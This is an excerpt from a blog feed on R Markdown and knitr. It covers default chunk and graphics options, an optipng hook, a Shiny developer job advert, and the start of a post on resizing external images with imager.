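&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Set once, in the first chunk of the document
knitr::opts_chunk$set(
  echo = TRUE, # FALSE usually makes more sense for client reports
  collapse = TRUE,
  comment = &amp;#34;#&amp;gt;&amp;#34;
)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;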
&lt;h2 id="graphics-options"&gt;Graphics Options&lt;/h2&gt;
&lt;p&gt;We’ve just had three blog posts on graphics options, so clearly
standardisation is a good thing here! Having a consistent set of
{knitr} options makes standardising figures across documents (slightly)
easier.&lt;/p&gt;
&lt;p&gt;These options control the graphics options.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;fig.path = &amp;quot;graphics/knitr-&amp;quot;&lt;/code&gt;: create a standard directory where
generated figures are stored. For our Hugo blog posts, we set
&lt;code&gt;fig.path = &amp;quot;&amp;quot;&lt;/code&gt; so the images are stored in the same directory as
the &lt;code&gt;md&lt;/code&gt; file.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.width = 6&lt;/code&gt;: the default of 7 is a little large for most purposes.
This is coupled with &lt;code&gt;fig.asp = 0.7&lt;/code&gt; to set the aspect ratio. If you
decide you want to set &lt;code&gt;fig.height&lt;/code&gt; in a code chunk, you also need
to set &lt;code&gt;fig.asp = NULL&lt;/code&gt; in that chunk. See the note at the end of
this post for a further discussion on aspect ratios.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.pos = &amp;quot;t&amp;quot;&lt;/code&gt;: when creating PDF documents, place the figures at
the top of the page. Having figures placed where they appear in the text
can result in poorly laid-out pages, with dangling sentences at the
bottom/top of the page.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.align = &amp;quot;center&amp;quot;&lt;/code&gt;: centre the figure in the document. This
gives the graph a more prominent place.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.retina = 2&lt;/code&gt;: use figures suitable for a retina display. The
default in {rmarkdown} HTML documents is &lt;code&gt;2&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dpi&lt;/code&gt; differs for HTML and PDF documents. For PDF documents, we set
&lt;code&gt;dpi = 300&lt;/code&gt;; otherwise, we leave it at 72 (see our previous blog
post on &lt;a href=""&gt;optimal figures&lt;/a&gt; for information). We can be clever, and
set &lt;code&gt;dpi = if (knitr::is_latex_output()) 300 else 72&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;out.width = &amp;quot;100%&amp;quot;&lt;/code&gt;: We typically set this on a graph-by-graph basis.&lt;/li&gt;
&lt;/ul&gt;
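&lt;p&gt;As a rough sketch of how these settings interact, the arithmetic below works out the figure height and pixel dimensions implied by the values above. The variable names are ours, chosen for illustration, and we assume (following the {knitr} documentation for &lt;code&gt;fig.retina&lt;/code&gt;) that &lt;code&gt;dpi&lt;/code&gt; is multiplied by &lt;code&gt;fig.retina&lt;/code&gt; for bitmap devices such as PNG.&lt;/p&gt;

```r
# Values taken from the options discussed above
fig_width = 6    # inches
fig_asp = 0.7    # height divided by width
dpi = 72         # the value we leave in place for HTML output
fig_retina = 2

# fig.asp fixes the height once the width is known
fig_height = fig_width * fig_asp

# Assumption: for bitmap output, the stored image uses
# dpi * fig.retina pixels per inch
pixel_width = fig_width * dpi * fig_retina
pixel_height = fig_height * dpi * fig_retina

# The image is then displayed at the non-retina width
display_width = pixel_width / fig_retina

c(height_in = fig_height, stored_px = pixel_width, shown_px = display_width)
```

&lt;p&gt;For vector devices such as SVG, the pixel counts do not apply in the same way, so treat this as a guide for PNG or JPEG output only.&lt;/p&gt;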
&lt;h3 id="graphics-device"&gt;Graphics Device&lt;/h3&gt;
&lt;p&gt;The graphics device is the device used to create the
graphics. This option is controlled via the &lt;code&gt;dev&lt;/code&gt; argument. For our
training courses, where we produce PDF booklets of notes, we set &lt;code&gt;dev = &amp;quot;cairo_pdf&amp;quot;&lt;/code&gt; as the default. For blog posts and HTML documents, such as
this, we set &lt;code&gt;dev = &amp;quot;svg&amp;quot;&lt;/code&gt;. We also set &lt;code&gt;dev.args = list(png = list(type = &amp;quot;cairo-png&amp;quot;))&lt;/code&gt;, so that when we set &lt;code&gt;dev = &amp;quot;png&amp;quot;&lt;/code&gt;, we use the
&lt;code&gt;cairo-png&lt;/code&gt; variety.&lt;/p&gt;
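&lt;p&gt;One way to avoid hard-coding the device per document is to pick it from the output format. The helper below is a minimal sketch; &lt;code&gt;choose_device()&lt;/code&gt; is a hypothetical name of ours, not part of {knitr}.&lt;/p&gt;

```r
# Hypothetical helper: pick a graphics device for the output format
choose_device = function(is_pdf) {
  if (is_pdf) "cairo_pdf" else "svg"
}

choose_device(TRUE)   # device for PDF booklets
choose_device(FALSE)  # device for blog posts and other HTML output

# In a document, the flag would typically come from knitr, e.g.
# knitr::opts_chunk$set(dev = choose_device(knitr::is_latex_output()))
```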
&lt;h2 id="knitr-hooks"&gt;{knitr} hooks&lt;/h2&gt;
&lt;p&gt;In our recent blog post on &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;optimising
PNG&lt;/a&gt;
images, we discussed the &lt;code&gt;optipng&lt;/code&gt; utility for reducing your file size.
It’s actually straightforward to use &lt;code&gt;optipng&lt;/code&gt; as a {knitr} hook, i.e.
whenever you generate a PNG file, &lt;code&gt;optipng&lt;/code&gt; automatically runs.&lt;/p&gt;
&lt;p&gt;If you have &lt;code&gt;optipng&lt;/code&gt; installed, you simply add the hook&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;knit_hooks&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(optipng &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;hook_optipng)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;to the top of your document. You can also tweak the options via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# The args `-o1 -quiet` are passed to optipng&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(optipng &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;-o1 -quiet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="putting-it-all-together"&gt;Putting it all together&lt;/h2&gt;
&lt;p&gt;When we put all of the above together, we end up with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(echo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; comment &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#&amp;gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;graphics/knitr-&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.retina &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Control using dpi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# generated images&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;t&amp;#34;&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# pdf mode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.align &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;center&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dpi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is_latex_output&lt;/span&gt;()) &lt;span style="color:#a5d6ff"&gt;300&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;72&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; out.width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dev &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;svg&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dev.args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(png &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; optipng &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;-o1 -quiet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This can then be placed in a simple helper package to avoid
duplication.&lt;/p&gt;
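&lt;p&gt;What such a helper might look like is sketched below. The function names &lt;code&gt;default_chunk_options()&lt;/code&gt; and &lt;code&gt;set_chunk_defaults()&lt;/code&gt; are hypothetical, and the values simply mirror the options described in this post; adapt both to your own documents.&lt;/p&gt;

```r
# Hypothetical helper, e.g. living in an internal package.
# Returns the chunk options as a plain list so they are easy to inspect.
default_chunk_options = function(pdf = FALSE, echo = FALSE) {
  list(
    echo = echo,
    collapse = TRUE,
    comment = "#>",
    fig.path = "graphics/knitr-",
    fig.width = 6,
    fig.asp = 0.7,
    fig.pos = "t",
    fig.align = "center",
    dpi = if (pdf) 300 else 72,
    dev = if (pdf) "cairo_pdf" else "svg"
  )
}

# Apply the defaults; calling this requires the knitr package
set_chunk_defaults = function(...) {
  do.call(knitr::opts_chunk$set, default_chunk_options(...))
}

str(default_chunk_options(pdf = TRUE))
```

&lt;p&gt;Keeping the list separate from the call that applies it means the defaults can be checked without knitting a document, and each report only needs a single &lt;code&gt;set_chunk_defaults()&lt;/code&gt; call in its setup chunk.&lt;/p&gt;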
&lt;h3 id="a-note-on-aspect-ratio-figasp"&gt;A note on aspect ratio: fig.asp&lt;/h3&gt;
&lt;p&gt;As with all graphics-related options, there isn’t one single setting that
is suitable for all situations. While &lt;code&gt;fig.asp=0.7&lt;/code&gt; gives a sensible
default, you shouldn’t be frightened to change it. I found this article on
when to use &lt;a href="https://graphworkflow.com/enhancement/aspect/" rel="external"&gt;different
aspect&lt;/a&gt; ratios very
informative. R for Data Science also has a short section on &lt;a href="https://r4ds.had.co.nz/graphics-for-communication.html#figure-sizing" rel="external"&gt;figure
sizing&lt;/a&gt;
that’s worth reading.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job: Shiny Developer</title><link>https://www.jumpingrivers.com/blog/job-shiny-developer/</link><pubDate>Fri, 12 Mar 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-shiny-developer/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-shiny-developer/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-shiny-developer/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are currently developing a SAAS Shiny application. We have a
prototype that is functional, but not ready for release. Your role will
be to refactor the application, and push it towards public release. The
core requirements for this role are Shiny experience, plus CSS and
JavaScript. If you have experience in deployment, that’s great, but it isn’t
required.&lt;/p&gt;
&lt;p&gt;This Shiny application will be your main role, but not your only one. As
a small company, we often take on a variety of jobs. In particular,
helping out with new and on-going Shiny related projects. An approximate
split would be 2.5 days on the SAAS Shiny app and 2.5 days on other
projects.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location:&lt;/strong&gt; Remote, but within the UK.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Salary:&lt;/strong&gt; ~£25K - £40K&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Application:&lt;/strong&gt; CVs can be submitted via
&lt;a href="https://jumping-rivers.welcomekit.co/" rel="external"&gt;welcomekit.co&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="technical-duties"&gt;Technical duties:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Building web applications using R and Shiny&lt;/li&gt;
&lt;li&gt;Basic data analysis using R and/or Python&lt;/li&gt;
&lt;li&gt;Depending on the applicant, provide technical training&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="client-contact"&gt;Client contact:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Attend on-site client meetings (at some point in the future)&lt;/li&gt;
&lt;li&gt;Off-site meetings via video conference call&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="technologies"&gt;Technologies&lt;/h3&gt;
&lt;p&gt;The following is to give you a flavour of how Jumping Rivers runs
internally. If you have never used these tools, don’t worry, we can
teach you.&lt;/p&gt;
&lt;p&gt;Almost everyone uses Linux, from the Admin team to the data scientists.
We all use GitLab. Our main languages are R &amp;amp; Python.&lt;/p&gt;
&lt;h3 id="preferred-experience"&gt;Preferred Experience&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Shiny experience! One of your first interview questions will ask
you to take us through a recent Shiny application you have
developed.&lt;/li&gt;
&lt;li&gt;CSS and Javascript&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://jumping-rivers.welcomekit.co/" rel="external"&gt;Apply Now&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-shiny-developer/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>External Graphics with knitr</title><link>https://www.jumpingrivers.com/blog/knitr-include-graphics-external/</link><pubDate>Tue, 23 Feb 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/knitr-include-graphics-external/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/knitr-include-graphics-external/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/featured.jpeg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part three of our four part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Specifying the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct figure
dimension&lt;/a&gt;
in {knitr}.&lt;/li&gt;
&lt;li&gt;Part 2: What &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;image
format&lt;/a&gt;
should you use for graphics.&lt;/li&gt;
&lt;li&gt;Part 3: Including &lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/" rel="external"&gt;external
graphics&lt;/a&gt;
in your document (this post).&lt;/li&gt;
&lt;li&gt;Part 4: Setting default {knitr}
&lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;options&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this third post, we’ll look at including external images, such as
figures and logos, in HTML documents. This is relevant for all R markdown
files, including fancy things like {bookdown}, {distill} and {pkgdown}.
The main difference with the images discussed in this post, is that the
image &lt;em&gt;isn’t&lt;/em&gt; generated by R. Instead, we’re thinking of something like
a photograph. When including an image in your web-page, the two key
points are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What size is your image?&lt;/li&gt;
&lt;li&gt;What’s the size of your HTML/CSS container on your web-page?&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="sizing-your-image"&gt;Sizing your image&lt;/h2&gt;
&lt;p&gt;Let’s suppose we want to include a (pre-covid) picture of the &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping
Rivers&lt;/a&gt; team. If you click on the
&lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office.jpeg"&gt;original picture&lt;/a&gt;, you’ll see that it takes a second to
load and also fills the page. This is a &lt;strong&gt;very&lt;/strong&gt; strong hint that the
dimensions need to be changed. On our web-page, we intend to place the
image as a featured image (think the header image of a blog post). The
dimensions of this are 400px by 400px (typically the resolution will be
larger than this).&lt;/p&gt;
&lt;p&gt;We can determine the image dimensions of our original image using the
{imager} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;imager&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;original &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load.image&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;dim&lt;/span&gt;(original)[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;d
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 4409 3307&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As you might have guessed, the dimensions are far larger than required,
4409px by 3307px instead of 400px square. This, in turn, corresponds to
an overly large file size&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fs&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file_info&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office.jpeg&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;size
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3.4M&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;My general rule of thumb, is&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;don’t lose sleep about images less than 200kb&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Also, as the original image isn’t square, we can’t just squash the image
into a square box, as this will distort the picture.&lt;/p&gt;
&lt;p&gt;Instead, we’ll scale one dimension to match 400px&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(d &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;img &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;resize&lt;/span&gt;(original,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;width&lt;/span&gt;(original) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; scale,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;height&lt;/span&gt;(original) &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; scale,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; interpolation_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;img
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Image. Width: 399 pix Height: 300 pix Depth: 1 Colour channels: 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;then pad the other dimension with a white background&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;square_img &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pad&lt;/span&gt;(img,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nPix &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;400&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;height&lt;/span&gt;(img),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; val &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;white&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;imager&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;save.image&lt;/span&gt;(square_img, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;square_img
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Image. Width: 399 pix Height: 400 pix Depth: 1 Colour channels: 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As we have scaled the image to have the correct dimensions, the file
size is also smaller&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fs&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file_info&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;office_square.jpeg&amp;#34;&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;size
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 24.4K&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
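&lt;p&gt;The scaling arithmetic used above can be checked without loading the image. The sketch below uses only base R and the dimensions reported earlier; the variable names and the explicit rounding are our additions.&lt;/p&gt;

```r
# Dimensions of the original image, as reported above
d = c(width = 4409, height = 3307)
target = 400

# Scale by the longer side so the whole image fits in the box
scale = max(d / target)
scaled = round(d / scale)

# Rows of padding needed to make the result square
padding = target - min(scaled)

scaled
padding
```

&lt;p&gt;Dividing by the larger of the two ratios keeps the aspect ratio intact, so only the shorter side needs padding.&lt;/p&gt;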
&lt;aside class="advert"&gt;
&lt;p&gt;
